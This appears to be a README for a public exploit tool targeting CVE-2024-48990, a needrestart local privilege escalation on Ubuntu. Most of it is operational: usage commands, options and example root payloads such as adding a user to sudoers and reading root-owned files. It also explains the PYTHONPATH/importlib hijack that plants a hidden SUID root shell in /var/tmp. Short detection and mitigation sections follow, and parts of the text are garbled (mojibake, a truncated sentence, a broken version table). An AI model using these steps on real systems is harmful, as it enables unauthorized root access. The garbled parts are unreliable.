## https://sploitus.com/exploit?id=2B6060FA-3822-5803-B968-1E696C087580
# CVE-2024-48990 โ needrestart Local Privilege Escalation
Local privilege escalation exploit targeting **needrestart /environ` โ including `PYTHONPATH`. An unprivileged local user can exploit this by:
1. Setting `PYTHONPATH` to a directory containing a malicious `importlib` package
2. Keeping a Python process running so needrestart picks it up during its scan
3. Waiting for needrestart to execute โ it loads the attacker's `importlib/__init__.py` **as root**
## Affected Versions
| Package | Vulnerable | Fixed |
|---|---|---|
| needrestart | = 3.8 |
Confirmed on:
- Ubuntu 22.04 LTS (Jammy) โ `needrestart 3.5-5ubuntu2.4`
- Ubuntu 24.04 LTS (Noble) โ `needrestart 3.6-7ubuntu4`
## Usage
```bash
chmod +x exploit.sh
./exploit.sh
```
Then trigger needrestart from another terminal:
```bash
# If you have direct sudo access to needrestart:
sudo /usr/sbin/needrestart
# Or trigger it via apt (needrestart runs as a post-apt hook):
sudo apt update && sudo apt install --reinstall coreutils
```
Once needrestart triggers, the exploit creates a SUID shell at `/var/tmp/.rootshell` and drops you into a root shell automatically.
If the auto-exec doesn't work, grab the shell manually:
```bash
/var/tmp/.rootshell -p
```
### Options
```
Usage: ./exploit.sh [OPTIONS]
Options:
-c Custom shell command to run as root (default: copy suid shell)
-w Max wait time in seconds (default: 300)
-t Trigger mode: attempt to trigger needrestart via apt
-n No cleanup: keep payload directory after exploitation
-h Show this help message
```
### Examples
```bash
# Default โ creates a SUID /bin/bash copy at /var/tmp/.rootshell
./exploit.sh
# Auto-trigger needrestart via apt (requires sudo apt access)
./exploit.sh -t
# Custom payload: add current user to sudoers
./exploit.sh -c 'usermod -aG sudo targetuser'
# Custom payload: read a restricted file
./exploit.sh -c 'cat /root/flag.txt > /tmp/flag.txt && chmod 644 /tmp/flag.txt'
# Extended wait (10 minutes)
./exploit.sh -w 600
```
## How It Works
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 1. Creates /tmp/.nr_XXXX/importlib/__init__.py with payload โ
โ that runs os.system() to copy /bin/bash as SUID binary โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 2. Spawns a long-running Python process with โ
โ PYTHONPATH=/tmp/.nr_XXXX exported in its environment โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 3. needrestart runs (via sudo or apt hook), scans โ
โ /proc/*/environ, finds the Python process โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 4. needrestart re-invokes python3 AS ROOT inheriting the โ
โ attacker's PYTHONPATH โ loads malicious importlib โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 5. Payload executes as root: cp /bin/bash + chmod 4755 โ
โ โ attacker runs /var/tmp/.rootshell -p โ root shell โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
### Notes
- The SUID shell is placed in `/var/tmp/` rather than `/tmp/` because `/tmp` is commonly mounted with `nosuid`, which silently strips the SUID bit.
- The malicious `importlib/__init__.py` restores the real `importlib` after payload execution by cleaning `sys.path` and `sys.modules`, so needrestart doesn't crash visibly.
- The decoy Python process runs an actual `.py` file (not a `-c` one-liner) for better compatibility with needrestart's interpreter scanning.
## Detection
Indicators that this exploit has been used:
- Unexpected SUID binaries in `/var/tmp/` or `/tmp/`
- Python processes running with unusual `PYTHONPATH` values pointing to temp directories
- Directories matching `/tmp/.nr_*` containing an `importlib/` subdirectory
## Mitigation
```bash
# Update needrestart to the patched version
sudo apt update && sudo apt install needrestart
# Or disable interpreter scanning entirely
echo "\$nrconf{interpscan} = 0;" | sudo tee /etc/needrestart/conf.d/no-interp.conf
```
## References
- [CVE-2024-48990](https://nvd.nist.gov/vuln/detail/CVE-2024-48990)
- [Qualys Advisory โ needrestart LPE](https://www.qualys.com/2024/11/19/needrestart/needrestart.txt)
- [Ubuntu Security Notice USN-7117-1](https://ubuntu.com/security/notices/USN-7117-1)
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Use it only on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
## License
MIT